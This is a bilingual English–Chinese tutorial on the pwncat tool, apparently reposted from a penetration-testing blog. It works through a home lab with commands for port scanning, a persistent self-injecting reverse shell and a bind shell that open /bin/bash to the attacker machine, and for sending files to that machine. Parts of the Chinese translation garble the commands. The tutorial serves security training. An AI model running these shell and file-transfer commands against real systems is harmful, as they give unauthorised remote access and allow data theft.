原文始发于Raj Chandel’s Blog:A Detailed Guide on Pwncat
Pwncat stands out as an open-source Python tool highly regarded for its versatility, providing a contemporary alternative to the traditional netcat utility. Tailored for network exploration, exploitation, and penetration testing needs, it offers a modernized approach to these tasks. With an emphasis on user-friendly features and comprehensive functionality, pwncat facilitates seamless interactions with network services, aiding in reconnaissance and vulnerability assessment.
Pwncat 作为一款开源 Python 工具脱颖而出,因其多功能性而备受推崇,为传统的 netcat 实用程序提供了现代替代方案。它专为满足网络探索、利用和渗透测试需求而量身定制,为这些任务提供了现代化的方法。pwncat 强调用户友好的特性和全面的功能,促进与网络服务的无缝交互,有助于侦察和漏洞评估。
The official documentation for the usage of this tool can be checked from here: https://pwncat.org/
可以使用此工具的官方文档从此处查看:https://pwncat.org/
Table of Content 目录
- Lab Setup 实验室设置
- Installation 安装
- Usage 用法
- Port Scanning and Banner grabbing
端口扫描和横幅抓取 - As a listener 作为倾听者
- Reverse Shell (Windows) 反向 Shell (Windows)
- Local Port Forwarding 本地端口转发
- To Send/Receive files 发送/接收文件
- Bind Shell (Linux) 绑定 Shell (Linux)
- Advantages over Netcat 与Netcat相比的优势
- Conclusion 结论
Lab Setup 实验室设置
In this article, we are going to show the usage of pwncat on both linux and windows target machines as mentioned below:
在本文中,我们将展示 pwncat 在 linux 和 windows 目标机器上的用法,如下所述:
Target Machines: Ubuntu (192.168.1.23), Windows (192.168.1.4)
目标计算机:Ubuntu (192.168.1.23)、Windows (192.168.1.4)
Attacker Machine: Kali Linux (192.168.1.7)
攻击者计算机:Kali Linux (192.168.1.7)
Installation 安装
Installation of pwncat can be done using pip or apt.
pwncat 的安装可以使用 pip 或 apt 完成。
To install using apt use the following command:
要使用 apt 进行安装,请使用以下命令:
apt install pwncat apt 安装 pwncat
To install using pip use the following command:
要使用 pip 进行安装,请使用以下命令:
pip install pwncat pip 安装 pwncat
Usage 用法
Port scanning and Banner grabbing
端口扫描和横幅抓取
Pwncat can be used to perform both port scanning and banner grabbing on the open ports by stating the range of ports along with the –banner flag.
Pwncat 可用于通过说明端口范围以及 –banner 标志来对开放端口执行端口扫描和横幅抓取。
pwncat -z 192.168.1.23 1–100
pwncat -z 192.168.1.23 1–100 –banner
pwncat -z 192.168.1.23 1-100 –横幅
pwncat -z 192.168.1.23 1-100 –横幅
Pwncat not only performs port scanning on TCP ports it can also scan UDP ports just by using a -u flag in the above command.
Pwncat 不仅可以在 TCP 端口上执行端口扫描,还可以通过在上述命令中使用 -u 标志来扫描 UDP 端口。
As a Listener 作为倾听者
When used as a listener pwncat holds a persistence by creating a file in the /tmp/ directory. Therefore, if a connection is lost the reverse shell can still be obtained at the same port which was previously used like a persistence.
当用作侦听器时,pwncat 通过在 /tmp/ 目录中创建文件来保存持久性。因此,如果连接丢失,仍然可以在以前用作持久性的同一端口上获得反向 shell。
pwncat -l 1234 –self-inject /bin/bash:192.168.1.7:1234
pwncat -l 1234 –自注入 /bin/bash:192.168.1.7:1234
pwncat -l 1234 –自注入 /bin/bash:192.168.1.7:1234
The persistence can be checked by running a rlwrap listener at the same port after terminating the above connection.
终止上述连接后,可以通过在同一端口运行 rlwrap 侦听器来检查持久性。
Pwncat has a feature to create persistence on multiple ports which can be performed using the following command:
Pwncat 具有在多个端口上创建持久性的功能,可以使用以下命令执行:
pwncat -l 1234 –self-inject /bin/bash:192.168.1.7:1234+2
pwncat -l 1234 –自注入 /bin/bash:192.168.1.7:1234+2
pwncat -l 1234 –自注入 /bin/bash:192.168.1.7:1234+2
It can be observed that along with port 1234, the reverse shell can also be obtained on the ports 1235 and 1236.
可以看出,除了端口1234外,还可以在端口1235和1236上获得反向外壳。
Reverse Shell (Windows) 反向 Shell (Windows)
To get a reverse shell, command can be used from the reverse shell generator (https://www.revshells.com/) in the Windows machine to get a reverse shell.
若要获取反向 shell,可以使用 Windows 计算机中的反向 shell 生成器 (https://www.revshells.com/) 中的命令来获取反向 shell。
Before executing the command copied from the revshells.com, start a listener at port 4444 in the kali machine using the following command:
在执行从 revshells.com 复制的命令之前,请使用以下命令在 kali 计算机的端口 4444 处启动侦听器:
pwncat -l 4444 PWNCAT -L 4444型
Local Port Forwarding 本地端口转发
Perform the installation of pwncat inside the Ubuntu machine using the following command:
使用以下命令在 Ubuntu 计算机中执行 pwncat 的安装:
pip3 install pwncat pip3 安装 pwncat
After a reverse shell is obtained using the usage discussed in the As a Listener section. It was observed that an application is running internally inside the Ubuntu machine at port 8080. Hence to access that web application inside our kali machine, we will perform Local Port forwarding using the following command:
使用“作为侦听器”一节中讨论的用法获取反向 shell 后。观察到一个应用程序正在 Ubuntu 计算机内部的端口 8080 处运行。因此,要在我们的 kali 机器中访问该 Web 应用程序,我们将使用以下命令执行本地端口转发:
pwncat -L 0.0.0.0:5000 127.0.0.1 8080
pwncat -L 0.0.0.0:5000 127.0.0.1 8080
pwncat -L 0.0.0.0:5000 127.0.0.1 8080
After the execution of the above command, the web application can now be accessed inside the kali machine at the URL: http://192.168.1.23:5000
执行上述命令后,现在可以在 kali 机器内访问 Web 应用程序,网址为:http://192.168.1.23:5000
Send and Receive Files 发送和接收文件
Besides the above discussed usage pwncat can also be used to send/receive files. It starts with the installation of pwncat in the ubuntu machine.
除了上面讨论的用法外,pwncat 还可用于发送/接收文件。它从在 ubuntu 机器中安装 pwncat 开始。
This includes creating a file in the Ubuntu system as data.txt file in the ubuntu machine and start a listener in the kali machine where the file is to be received.
这包括在 Ubuntu 系统中创建一个文件作为 ubuntu 机器中的data.txt文件,并在要接收文件的 kali 机器中启动侦听器。
To receive the file in the kali machine, the following command can be used:
要在 kali 机器中接收文件,可以使用以下命令:
pwncat -l 6666 > data.txt
After the listener is active the following command can be used to transfer the file in kali machine.
侦听器处于活动状态后,可以使用以下命令在 kali 机器中传输文件。
pwncat 192.168.1.7 6666 < data.txt
Bind Shell (Linux) 绑定 Shell (Linux)
To get a bind shell start a listener inside the kali machine using the following command:
要获取绑定 shell,请使用以下命令在 kali 机器内启动侦听器:
pwncat 192.168.1.23 9874 PWNCAT的 192.168.1.23 9874
Inside the Ubuntu machine type the following command:
在 Ubuntu 计算机中键入以下命令:
pwncat -l -e ‘/bin/bash ‘ 9874 -k
It can be observed that the bind shell connection is obtained on the kali machine. Because of -k flag used above the bind shell will re-accept new clients as soon as a client has disconnected.
可以观察到,绑定壳连接是在 kali 机器上获得的。由于上面使用了 -k 标志,绑定 shell 将在客户端断开连接后立即重新接受新客户端。
It can be noted that the above procedure is also satisfied while working with the UDP ports just by using -u flag after the command.
需要注意的是,在使用 UDP 端口时,只需在命令后使用 -u 标志即可满足上述过程。
Advantages over Netcat 与Netcat相比的优势
Pwncat, a feature-rich netcat-like tool designed for pentesters and red teamers, offers several enhancements over traditional Netcat:
Pwncat 是一款功能丰富的类似 netcat 的工具,专为渗透测试人员和红队成员设计,与传统 Netcat 相比,它提供了多项增强功能:
- Interactive Shell 交互式外壳
- Scriptable Interface 可编写脚本的接口
- Encrypted Communication 加密通信
- Persistance 坚持
Pwncat provides an interactive shell with syntax highlighting and command completion, improving the user experience. Pentesters can automate tasks using Pwncat’s Python scripting interface, allowing for greater flexibility and customization. It also supports encrypted communication channels, ensuring confidentiality when interacting with compromised systems.
Pwncat 提供具有语法高亮和命令补全功能的交互式 shell,提升用户体验。渗透测试人员可以使用 Pwncat 的 Python 脚本界面自动执行任务,从而实现更大的灵活性和自定义性。它还支持加密的通信通道,确保与受感染系统交互时的机密性。
Conclusion 结论
In conclusion, we can say that pentesters/red teamers can use a lot of tools to get reverse shell/bind shell/ upload-download files/Local Port forwarding and many more. However, if pwncat is considered in regular practise it can prove to be a very valuable and time saving tool.
总之,我们可以说渗透测试者/红队可以使用很多工具来获取反向 shell/绑定 shell/上传下载文件/本地端口转发等等。但是,如果在常规实践中考虑 pwncat,它可以证明是一个非常有价值且节省时间的工具。
相关文章
